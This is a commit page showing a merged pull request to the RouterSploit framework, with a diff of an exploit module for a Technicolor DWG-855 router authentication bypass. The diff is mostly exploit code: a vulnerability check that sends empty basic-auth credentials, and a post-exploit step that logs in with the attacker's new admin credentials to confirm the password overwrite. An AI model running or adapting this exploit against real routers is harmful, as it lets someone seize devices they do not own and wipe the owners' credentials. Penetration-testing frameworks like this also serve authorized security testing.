Merge pull request #180 from JPaulMora/master

Updated exploit info, fixed post-exploit check for success.

Merge pull request #180 from JPaulMora/master
Updated exploit info, fixed post-exploit check for success.
efa04dd3 · Marcin Bury · GitHub · c42a0c69 · 2a523a6d · efa04dd3
Commit efa04dd3 authored Feb 20, 2017 by Marcin Bury Committed by GitHub Feb 20, 2017
Show whitespace changes
Inline Side-by-side

Showing with 15 additions and 15 deletions

dwg855_authbypass.py ...rsploit/modules/exploits/technicolor/dwg855_authbypass.py +15 -15

No files found.
--- a/routersploit/modules/exploits/technicolor/dwg855_authbypass.py
+++ b/routersploit/modules/exploits/technicolor/dwg855_authbypass.py
@@ -19,11 +19,11 @@ class Exploit(exploits.Exploit):
        'name': 'Technicolor DWG-855 Auth Bypass',
        'description': 'Module exploits Technicolor DWG-855 Authentication Bypass vulnerability which allows changing administrator\'s password.\n\nNOTE: This module will errase previous credentials, this is NOT stealthy.',
        'authors': [
-            'JPaulMora <https://JPaulMora.GitHub.io>',  # vulnerability discovery, routersploit module
+            'JPaulMora <https://JPaulMora.GitHub.io>',  # vulnerability discovery, initial routersploit module.
            '0BuRner',  # routersploit module
        ],
        'references': [
-            'No references, at time of write its a 0day. Check my page though I probably wrote something about it.',
+            'Bug discovered some time before Aug 2016, this is the first reference to it!\n   This exploit works with any POST parameter, but changing admin creds gives you access to everything else.',
        ],
        'devices': [
            'Technicolor DWG-855',
@@ -49,28 +49,28 @@ class Exploit(exploits.Exploit):
            response = http_request(method="POST", url=url, headers=headers, data=data)

            if response is None:
-                print_error("Target did not answer request")
+                print_error("Target did not answer request.")
+            elif response.status_code == 401:
+                # Server obeys request but then sends unauthorized response. Here we send a GET request with the new creds.
+                infotab_url = sanitize_url("{}:{}/RgSwInfo.asp".format(self.target, self.port))
+                check_response = http_request(method="GET", url=infotab_url, auth=(self.nuser, self.npass))
+
+                if check_response.status_code == 200:
+                    print_success("Credentials changed!")
                elif response.status_code == 401:
                    print_error("Target answered, denied access.")
                else:
-                print_success("Credentials changed")
+                    pass
+            else:
+                print_error("Unknown error.")
        else:
            print_error("Exploit failed - Target seems to be not vulnerable")

    @mute
    def check(self):
        url = sanitize_url("{}:{}/logo.jpg".format(self.target, self.port))
-        user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
-        headers = {'User-Agent': user_agent,
-                   'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
-                   'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
-                   'Connection': 'keep-alive',
-                   'Accept-Encoding': 'gzip, deflate',
-                   'Authorization': 'Og==',  # this is base64(":")
-                   'Cache-Control': 'no-cache'}
-
-        response = http_request(method="GET", url=url, headers=headers)
-
+        response = http_request(method="GET", url=url, auth=("", ""))
+        # print response.text.encode('utf-8')
        if response is not None and self.vulnresp in response.text.encode('utf-8'):
            return True
        else: